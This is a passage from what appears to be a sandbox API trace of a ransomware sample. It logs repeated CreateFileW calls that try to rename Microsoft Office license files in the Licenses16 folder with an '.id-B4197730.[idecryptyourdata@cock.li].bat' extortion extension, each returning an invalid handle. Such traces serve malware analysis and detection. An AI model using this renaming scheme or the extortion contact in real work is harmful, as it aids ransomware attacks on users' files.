dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.608] CloseHandle (hObject=0x50c) returned 1 [0163.609] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.609] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTrial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtrial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.609] CloseHandle (hObject=0x50c) returned 1 [0163.610] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.610] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.610] CloseHandle (hObject=0x50c) returned 1 [0163.611] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.611] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.611] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.611] CloseHandle (hObject=0x50c) returned 1 [0163.612] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.612] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.612] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.613] CloseHandle (hObject=0x50c) returned 1 [0163.614] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.614] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.614] CloseHandle (hObject=0x50c) returned 1 [0163.615] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.615] SetFilePointerEx (in: hFile=0x50c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.615] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.615] CloseHandle (hObject=0x50c) returned 1 [0163.867] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.867] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.867] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.867] CloseHandle (hObject=0x51c) returned 1 [0163.868] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.868] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.868] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.869] CloseHandle (hObject=0x51c) returned 1 [0163.869] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.870] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.870] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.870] CloseHandle (hObject=0x51c) returned 1 [0163.871] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.871] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.871] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremdemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.871] CloseHandle (hObject=0x51c) returned 1 [0163.872] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.872] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.872] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.872] CloseHandle (hObject=0x51c) returned 1 [0163.873] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.873] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.873] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.873] CloseHandle (hObject=0x51c) returned 1 [0163.874] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.874] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.874] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.874] CloseHandle (hObject=0x51c) returned 1 [0163.875] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.875] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.875] CloseHandle (hObject=0x51c) returned 1 [0163.876] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.876] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.876] CloseHandle (hObject=0x51c) returned 1 [0163.877] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.877] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.877] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.878] CloseHandle (hObject=0x51c) returned 1 [0163.878] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.878] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.879] CloseHandle (hObject=0x51c) returned 1 [0163.879] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.879] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.880] CloseHandle (hObject=0x51c) returned 1 [0163.884] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.884] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.884] CloseHandle (hObject=0x51c) returned 1 [0163.885] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.885] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.885] CloseHandle (hObject=0x51c) returned 1 [0163.886] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.886] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.886] CloseHandle (hObject=0x51c) returned 1 [0163.887] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.887] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.887] CloseHandle (hObject=0x51c) returned 1 [0163.888] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.888] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.888] CloseHandle (hObject=0x51c) returned 1 [0163.888] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.889] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.889] CloseHandle (hObject=0x51c) returned 1 [0163.890] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.890] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.890] CloseHandle (hObject=0x51c) returned 1 [0163.891] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.891] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.891] CloseHandle (hObject=0x51c) returned 1 [0163.892] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.892] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subscription5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.892] CloseHandle (hObject=0x51c) returned 1 [0163.893] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.893] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.893] CloseHandle (hObject=0x51c) returned 1 [0163.894] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.894] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.894] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.894] CloseHandle (hObject=0x51c) returned 1 [0163.895] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.895] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.895] CloseHandle (hObject=0x51c) returned 1 [0163.895] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.896] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33bfec0 | out: lpNewFilePointer=0x0) returned 1 [0163.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 